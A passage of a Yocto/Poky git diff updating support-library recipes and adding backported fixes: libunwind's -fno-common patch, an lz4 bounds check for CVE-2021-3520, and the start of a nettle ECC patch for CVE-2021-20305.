a/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb b/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb index 710ef0172d..841edc6829 100644 --- a/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb +++ b/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a95aadbdfae7ed812bb2b7b86eb5981c \ file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \ file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \ " -SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git \ +SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git;branch=master;protocol=https \ file://0001-Makefile-cleanup-install-for-rebuilds.patch \ file://0001-Make-man-pages-reproducible.patch" SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba" diff --git a/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb b/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb index fa8655e027..f2c36944d8 100644 --- a/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb +++ b/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb @@ -10,7 +10,7 @@ SECTION = "devel" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37" -SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre2-${PV}.tar.bz2 \ +SRC_URI = "http://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \ file://pcre-cross.patch \ " diff --git a/poky/meta/recipes-support/libpcre/libpcre_8.44.bb b/poky/meta/recipes-support/libpcre/libpcre_8.44.bb index cd80dc7345..3267c5ad72 100644 --- a/poky/meta/recipes-support/libpcre/libpcre_8.44.bb +++ b/poky/meta/recipes-support/libpcre/libpcre_8.44.bb @@ -7,7 +7,7 @@ HOMEPAGE = "http://www.pcre.org" SECTION = "devel" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e" -SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre-${PV}.tar.bz2 \ +SRC_URI = "${SOURCEFORGE_MIRROR}/pcre/pcre-${PV}.tar.bz2 \ file://run-ptest \ file://Makefile \ " diff --git a/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb b/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb index b2dda191ce..66e64f785c 100644 --- a/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb +++ b/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb @@ -19,11 +19,10 @@ SRC_URI[sha256sum] = "41bd1c75a375b85c337b59783f5deb93dbb443fb0a52d257f403df7bd6 UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases" -DEPENDS = "libidn2" - inherit autotools gettext gtk-doc manpages pkgconfig lib_package -PACKAGECONFIG ??= "" +PACKAGECONFIG ?= "idn2" PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native" - +PACKAGECONFIG[icu] = "--enable-runtime=libicu --enable-builtin=libicu,,icu" +PACKAGECONFIG[idn2] = "--enable-runtime=libidn2 --enable-builtin=libidn2,,libidn2 libunistring" BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb b/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb index 65b32557e7..e42ac30bf2 100644 --- a/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb +++ b/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb @@ -7,7 +7,7 @@ SECTION = "x11/gnome/libs" LICENSE = "LGPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2" -DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 intltool-native libpsl" +DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 libpsl" SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}" diff --git a/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb b/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb index 97fac4ecfa..2197b6656d 100644 --- a/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb +++ b/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb @@ -18,6 +18,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=6a6a8e020838b23406c81b19c1d46df6 \ file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \ file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \ " +DEPENDS = "gperf-native" SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \ file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \ diff --git a/poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch b/poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch new file mode 100644 index 0000000000..34a1f46b0f --- /dev/null +++ b/poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch @@ -0,0 +1,420 @@ +From 51112447b316813ad1ae50ea66feca4eb755a424 Mon Sep 17 00:00:00 2001 +From: Yichao Yu +Date: Tue, 31 Mar 2020 00:43:32 -0400 +Subject: [PATCH] Fix compilation with -fno-common. + +[Khem Raj] +Making all other archs consistent with IA64 which should not have this problem. +Also move the FIXME to the correct place. + +Also add some minimum comments about this... + +[Philippe Coval] + +Patch ported to v1.3-stable branch, +patch to be used used in openembedded-core dunfell branch (on v1.3.1) +for oniro project. + +Upstream-Status: Backport [https://github.com/libunwind/libunwind/pull/166] +Signed-off-by: Khem Raj +Thanks-to: Yichao Yu +Origin: https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e +Relate-to: https://booting.oniroproject.org/distro/oniro/-/issues/191 +Forwarded: https://github.com/libunwind/libunwind/pull/312 +Last-Update: 2021-11-25 +Signed-off-by: Philippe Coval +--- + src/aarch64/Ginit.c | 15 +++++++-------- + src/arm/Ginit.c | 15 +++++++-------- + src/coredump/_UPT_get_dyn_info_list_addr.c | 5 +++++ + src/hppa/Ginit.c | 15 +++++++-------- + src/ia64/Ginit.c | 1 + + src/mi/Gfind_dynamic_proc_info.c | 1 + + src/mips/Ginit.c | 15 +++++++-------- + src/ppc32/Ginit.c | 11 +++++++---- + src/ppc64/Ginit.c | 11 +++++++---- + src/ptrace/_UPT_get_dyn_info_list_addr.c | 5 +++++ + src/sh/Ginit.c | 15 +++++++-------- + src/tilegx/Ginit.c | 15 +++++++-------- + src/x86/Ginit.c | 15 +++++++-------- + src/x86_64/Ginit.c | 15 +++++++-------- + 14 files changed, 82 insertions(+), 72 deletions(-) + +diff --git a/src/aarch64/Ginit.c b/src/aarch64/Ginit.c +index 9c4eae82..cb954b15 100644 +--- a/src/aarch64/Ginit.c ++++ b/src/aarch64/Ginit.c +@@ -61,13 +61,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -78,7 +71,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/arm/Ginit.c b/src/arm/Ginit.c +index 2720d063..0bac0d72 100644 +--- a/src/arm/Ginit.c ++++ b/src/arm/Ginit.c +@@ -57,18 +57,17 @@ tdep_uc_addr (unw_tdep_context_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/coredump/_UPT_get_dyn_info_list_addr.c b/src/coredump/_UPT_get_dyn_info_list_addr.c +index 0d119055..739ed056 100644 +--- a/src/coredump/_UPT_get_dyn_info_list_addr.c ++++ b/src/coredump/_UPT_get_dyn_info_list_addr.c +@@ -74,6 +74,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + + #else + ++/* XXX fix me: there is currently no way to locate the dyn-info list ++ by a remote unwinder. On ia64, this is done via a special ++ unwind-table entry. Perhaps something similar can be done with ++ DWARF2 unwind info. */ ++ + static inline int + get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + int *countp) +diff --git a/src/hppa/Ginit.c b/src/hppa/Ginit.c +index 461e4b93..265455a6 100644 +--- a/src/hppa/Ginit.c ++++ b/src/hppa/Ginit.c +@@ -64,13 +64,6 @@ _Uhppa_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -81,7 +74,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ia64/Ginit.c b/src/ia64/Ginit.c +index b09a2ad5..8601bb3c 100644 +--- a/src/ia64/Ginit.c ++++ b/src/ia64/Ginit.c +@@ -68,6 +68,7 @@ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + if (!_U_dyn_info_list_addr) + return -UNW_ENOINFO; + #endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. + *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } +diff --git a/src/mi/Gfind_dynamic_proc_info.c b/src/mi/Gfind_dynamic_proc_info.c +index 98d35012..2e7c62e5 100644 +--- a/src/mi/Gfind_dynamic_proc_info.c ++++ b/src/mi/Gfind_dynamic_proc_info.c +@@ -49,6 +49,7 @@ local_find_proc_info (unw_addr_space_t as, unw_word_t ip, unw_proc_info_t *pi, + return -UNW_ENOINFO; + #endif + ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. + list = (unw_dyn_info_list_t *) (uintptr_t) _U_dyn_info_list_addr (); + for (di = list->first; di; di = di->next) + if (ip >= di->start_ip && ip < di->end_ip) +diff --git a/src/mips/Ginit.c b/src/mips/Ginit.c +index 3df170c7..bf7a8f5a 100644 +--- a/src/mips/Ginit.c ++++ b/src/mips/Ginit.c +@@ -69,13 +69,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -86,7 +79,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ppc32/Ginit.c b/src/ppc32/Ginit.c +index ba302448..7b454558 100644 +--- a/src/ppc32/Ginit.c ++++ b/src/ppc32/Ginit.c +@@ -91,9 +91,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -104,7 +101,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ppc64/Ginit.c b/src/ppc64/Ginit.c +index 4c88cd6e..7bfb395a 100644 +--- a/src/ppc64/Ginit.c ++++ b/src/ppc64/Ginit.c +@@ -95,9 +95,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -108,7 +105,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ptrace/_UPT_get_dyn_info_list_addr.c b/src/ptrace/_UPT_get_dyn_info_list_addr.c +index cc5ed044..16671d45 100644 +--- a/src/ptrace/_UPT_get_dyn_info_list_addr.c ++++ b/src/ptrace/_UPT_get_dyn_info_list_addr.c +@@ -71,6 +71,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + + #else + ++/* XXX fix me: there is currently no way to locate the dyn-info list ++ by a remote unwinder. On ia64, this is done via a special ++ unwind-table entry. Perhaps something similar can be done with ++ DWARF2 unwind info. */ ++ + static inline int + get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + int *countp) +diff --git a/src/sh/Ginit.c b/src/sh/Ginit.c +index 52988a72..9fe96d2b 100644 +--- a/src/sh/Ginit.c ++++ b/src/sh/Ginit.c +@@ -58,13 +58,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -75,7 +68,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/tilegx/Ginit.c b/src/tilegx/Ginit.c +index 7564a558..925e6413 100644 +--- a/src/tilegx/Ginit.c ++++ b/src/tilegx/Ginit.c +@@ -64,13 +64,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -81,7 +74,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/x86/Ginit.c b/src/x86/Ginit.c +index f6b8dc27..3cec74a2 100644 +--- a/src/x86/Ginit.c ++++ b/src/x86/Ginit.c +@@ -54,13 +54,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -71,7 +64,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/x86_64/Ginit.c b/src/x86_64/Ginit.c +index b7e8e462..fe6bcc33 100644 +--- a/src/x86_64/Ginit.c ++++ b/src/x86_64/Ginit.c +@@ -49,13 +49,6 @@ static struct unw_addr_space local_addr_space; + + unw_addr_space_t unw_local_addr_space = &local_addr_space; + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -66,7 +59,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +-- +2.32.0 + diff --git a/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb b/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb index 037e04c3c0..8ae94a834c 100644 --- a/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb +++ b/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb @@ -7,6 +7,7 @@ SRC_URI = "http://download.savannah.nongnu.org/releases/libunwind/libunwind-${PV file://0004-Fix-build-on-mips-musl.patch \ file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \ file://0006-Fix-for-X32.patch \ + file://0001-Fix-compilation-with-fno-common.patch \ " SRC_URI_append_libc-musl = " file://musl-header-conflict.patch" diff --git a/poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch new file mode 100644 index 0000000000..5ac8f6691f --- /dev/null +++ b/poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch @@ -0,0 +1,27 @@ +From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001 +From: Jasper Lievisse Adriaanse +Date: Fri, 26 Feb 2021 15:21:20 +0100 +Subject: [PATCH] Fix potential memory corruption with negative memmove() size + +Upstream-Status: Backport +https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7 +CVE: CVE-2021-3520 +Signed-off-by: Armin Kuster + +--- + lib/lz4.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: git/lib/lz4.c +=================================================================== +--- git.orig/lib/lz4.c ++++ git/lib/lz4.c +@@ -1665,7 +1665,7 @@ LZ4_decompress_generic( + const size_t dictSize /* note : = 0 if noDict */ + ) + { +- if (src == NULL) { return -1; } ++ if ((src == NULL) || (outputSize < 0)) { return -1; } + + { const BYTE* ip = (const BYTE*) src; + const BYTE* const iend = ip + srcSize; diff --git a/poky/meta/recipes-support/lz4/lz4_1.9.2.bb b/poky/meta/recipes-support/lz4/lz4_1.9.2.bb index 20719fcc58..0c4a0ac807 100644 --- a/poky/meta/recipes-support/lz4/lz4_1.9.2.bb +++ b/poky/meta/recipes-support/lz4/lz4_1.9.2.bb @@ -12,8 +12,9 @@ PE = "1" SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd" -SRC_URI = "git://github.com/lz4/lz4.git;branch=dev \ +SRC_URI = "git://github.com/lz4/lz4.git;branch=dev;protocol=https \ file://run-ptest \ + file://CVE-2021-3520.patch \ " UPSTREAM_CHECK_GITTAGREGEX = "v(?P.*)" diff --git a/poky/meta/recipes-support/lzo/lzo_2.10.bb b/poky/meta/recipes-support/lzo/lzo_2.10.bb index 85b14b3c5c..f0c8631aea 100644 --- a/poky/meta/recipes-support/lzo/lzo_2.10.bb +++ b/poky/meta/recipes-support/lzo/lzo_2.10.bb @@ -18,6 +18,8 @@ SRC_URI[sha256sum] = "c0f892943208266f9b6543b3ae308fab6284c5c90e627931446fb49b42 inherit autotools ptest +CVE_PRODUCT = "lzo oberhumer:lzo2" + EXTRA_OECONF = "--enable-shared" do_install_ptest() { diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch new file mode 100644 index 0000000000..cfc0f382fa --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch @@ -0,0 +1,215 @@ +Backport of: + +From a63893791280d441c713293491da97c79c0950fe Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= +Date: Thu, 11 Mar 2021 19:37:41 +0100 +Subject: [PATCH] New functions ecc_mod_mul_canonical and + ecc_mod_sqr_canonical. + +* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +New functions. +* ecc-internal.h: Declare and document new functions. +* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical. +* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical. +* ecc-eh-to-a.c (ecc_eh_to_a): Likewise. +* ecc-j-to-a.c (ecc_j_to_a): Likewise. +* ecc-mul-m.c (ecc_mul_m): Likewise. + +(cherry picked from commit 2bf497ba4d6acc6f352bca015837fad33008565c) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-1.patch +CVE: CVE-2021-20305 dep1 +Signed-off-by: Armin Kuster + +--- + ChangeLog | 11 +++++++++++ + curve25519-eh-to-x.c | 6 +----- + curve448-eh-to-x.c | 5 +---- + ecc-eh-to-a.c | 12 ++---------- + ecc-internal.h | 15 +++++++++++++++ + ecc-j-to-a.c | 15 +++------------ + ecc-mod-arith.c | 24 ++++++++++++++++++++++++ + ecc-mul-m.c | 6 ++---- + 8 files changed, 59 insertions(+), 35 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index fd138d82..5cc5c188 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,3 +1,14 @@ +#+2021-03-11 Niels Möller +#+ +#+ * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +#+ New functions. +#+ * ecc-internal.h: Declare and document new functions. +#+ * curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical. +#+ * curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical. +#+ * ecc-eh-to-a.c (ecc_eh_to_a): Likewise. +#+ * ecc-j-to-a.c (ecc_j_to_a): Likewise. +#+ * ecc-mul-m.c (ecc_mul_m): Likewise. +#+ +# 2021-02-17 Niels Möller +# +# * Released Nettle-3.7.1. +Index: nettle-3.5.1/curve25519-eh-to-x.c +=================================================================== +--- nettle-3.5.1.orig/curve25519-eh-to-x.c ++++ nettle-3.5.1/curve25519-eh-to-x.c +@@ -53,7 +53,6 @@ curve25519_eh_to_x (mp_limb_t *xp, const + #define t2 (scratch + 2*ecc->p.size) + + const struct ecc_curve *ecc = &_nettle_curve25519; +- mp_limb_t cy; + + /* If u = U/W and v = V/W are the coordiantes of the point on the + Edwards curve we get the curve25519 x coordinate as +@@ -69,10 +68,7 @@ curve25519_eh_to_x (mp_limb_t *xp, const + ecc->p.invert (&ecc->p, t1, t0, t2 + ecc->p.size); + + ecc_modp_add (ecc, t0, wp, vp); +- ecc_modp_mul (ecc, t2, t0, t1); +- +- cy = mpn_sub_n (xp, t2, ecc->p.m, ecc->p.size); +- cnd_copy (cy, xp, t2, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, xp, t0, t1, t2); + #undef vp + #undef wp + #undef t0 +Index: nettle-3.5.1/ecc-eh-to-a.c +=================================================================== +--- nettle-3.5.1.orig/ecc-eh-to-a.c ++++ nettle-3.5.1/ecc-eh-to-a.c +@@ -59,9 +59,7 @@ ecc_eh_to_a (const struct ecc_curve *ecc + /* Needs 2*size + scratch for the invert call. */ + ecc->p.invert (&ecc->p, izp, zp, tp + ecc->p.size); + +- ecc_modp_mul (ecc, tp, xp, izp); +- cy = mpn_sub_n (r, tp, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r, tp, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r, xp, izp, tp); + + if (op) + { +@@ -81,7 +79,5 @@ ecc_eh_to_a (const struct ecc_curve *ecc + } + return; + } +- ecc_modp_mul (ecc, tp, yp, izp); +- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, yp, izp, tp); + } +Index: nettle-3.5.1/ecc-internal.h +=================================================================== +--- nettle-3.5.1.orig/ecc-internal.h ++++ nettle-3.5.1/ecc-internal.h +@@ -49,6 +49,8 @@ + #define ecc_mod_submul_1 _nettle_ecc_mod_submul_1 + #define ecc_mod_mul _nettle_ecc_mod_mul + #define ecc_mod_sqr _nettle_ecc_mod_sqr ++#define ecc_mod_mul_canonical _nettle_ecc_mod_mul_canonical ++#define ecc_mod_sqr_canonical _nettle_ecc_mod_sqr_canonical + #define ecc_mod_random _nettle_ecc_mod_random + #define ecc_mod _nettle_ecc_mod + #define ecc_mod_inv _nettle_ecc_mod_inv +@@ -263,6 +265,19 @@ ecc_mod_sqr (const struct ecc_modulo *m, + #define ecc_modq_mul(ecc, r, a, b) \ + ecc_mod_mul (&(ecc)->q, (r), (a), (b)) + ++/* These mul and sqr functions produce a canonical result, 0 <= R < M. ++ Requirements on input and output areas are similar to the above ++ functions, except that it is *not* allowed to pass rp = rp + ++ m->size. ++ */ ++void ++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp); ++ ++void ++ecc_mod_sqr_canonical (const 